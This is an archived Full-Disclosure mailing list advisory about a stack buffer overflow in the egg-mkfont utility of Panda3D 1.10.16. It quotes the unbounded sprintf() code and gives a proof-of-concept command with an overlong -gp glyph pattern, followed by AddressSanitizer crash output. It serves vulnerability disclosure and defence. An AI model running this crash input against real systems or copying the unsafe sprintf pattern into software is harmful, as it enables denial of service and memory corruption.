| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAFmK-GzBREs3PQjnsPweMxDktNWr+i_MCujqqZwUiTcCNMeE+g@mail.gmail.com>
Date: Thu, 1 Jan 2026 03:31:52 -0500
From: Ron E <ronaldjedgerson@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Panda3d v1.10.16 egg-mkfont Stack Buffer Overflow
A stack-based buffer overflow vulnerability exists in the Panda3D
egg-mkfont utility due to the use of an unbounded sprintf() call with
attacker-controlled input. By supplying an excessively long glyph pattern
string via the -gp command-line option, an attacker can trigger a stack
buffer overflow, resulting in a deterministic crash of the egg-mkfont
process.
*Technical Details:*
The vulnerability occurs when egg-mkfont constructs output glyph filenames
using a fixed-size stack buffer and the unsafe sprintf() function. The
glyph pattern string (-gp option) is fully attacker-controlled and is not
length-checked prior to formatting.
*Vulnerable Code:*
char buffer[1024];
sprintf(buffer, _output_glyph_pattern.c_str(), character);
If the user supplies a glyph pattern string longer than the size of buffer,
sprintf() writes past the end of the stack buffer, corrupting adjacent
stack memory.
*Root Cause:*
- Use of sprintf() instead of a bounded formatting function
- Fixed-size stack buffer
- Attacker-controlled input passed directly to formatting routine
- No input length validation
*Impact:*
- *Denial of Service (DoS): *The egg-mkfont utility crashes reliably
when provided with crafted input.
- *Memory Corruption: *Stack memory beyond the intended buffer is
overwritten
- Possible Arbitrary code execution
*Proof of Concept:*
./egg-mkfont \
-gp "$(python3 - << 'EOF'
print("A" * 3000 + "%d")
EOF
)" \
/usr/share/fonts/truetype/dejavu/DejaVuSans.ttf \
out.egg
*Output:*
================================================================
==3237531==ERROR: AddressSanitizer: stack-buffer-overflow on address
0xfbff9e552880 at pc 0xffffb527bf2c bp 0xffffeae1dd60 sp 0xffffeae1d520
WRITE of size 3003 at 0xfbff9e552880 thread T0
#0 0xffffb527bf28 in vsprintf
../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1726
#1 0xffffb527d50c in __sprintf_chk
../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1774
#2 0xaaaadab5a62c in sprintf
/usr/include/aarch64-linux-gnu/bits/stdio2.h:30
#3 0xaaaadab5a62c in EggMakeFont::make_tref(PNMTextGlyph*, int)
/root/panda3d/pandatool/src/egg-mkfont/eggMakeFont.cxx:641
#4 0xaaaadab64670 in EggMakeFont::get_tref(PNMTextGlyph*, int)
/root/panda3d/pandatool/src/egg-mkfont/eggMakeFont.cxx:629
#5 0xaaaadab6584c in EggMakeFont::make_geom(PNMTextGlyph*, int)
/root/panda3d/pandatool/src/egg-mkfont/eggMakeFont.cxx:602
#6 0xaaaadab69848 in EggMakeFont::run()
/root/panda3d/pandatool/src/egg-mkfont/eggMakeFont.cxx:476
#7 0xaaaadab412c8 in main
/root/panda3d/pandatool/src/egg-mkfont/eggMakeFont.cxx:743
#8 0xffffa04f2598 in __libc_start_call_main
../sysdeps/nptl/libc_start_call_main.h:58
#9 0xffffa04f2678 in __libc_start_main_impl ../csu/libc-start.c:360
#10 0xaaaadab422ec in _start
(/root/panda3d/build-asan/bin/egg-mkfont+0x6822ec) (BuildId:
71c2d66676c55693efa5c9aa3c9dbe806f4cdc00)
Address 0xfbff9e552880 is located in stack of thread T0 at offset 2176 in
frame
#0 0xaaaadab5a4f8 in EggMakeFont::make_tref(PNMTextGlyph*, int)
/root/panda3d/pandatool/src/egg-mkfont/eggMakeFont.cxx:639
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists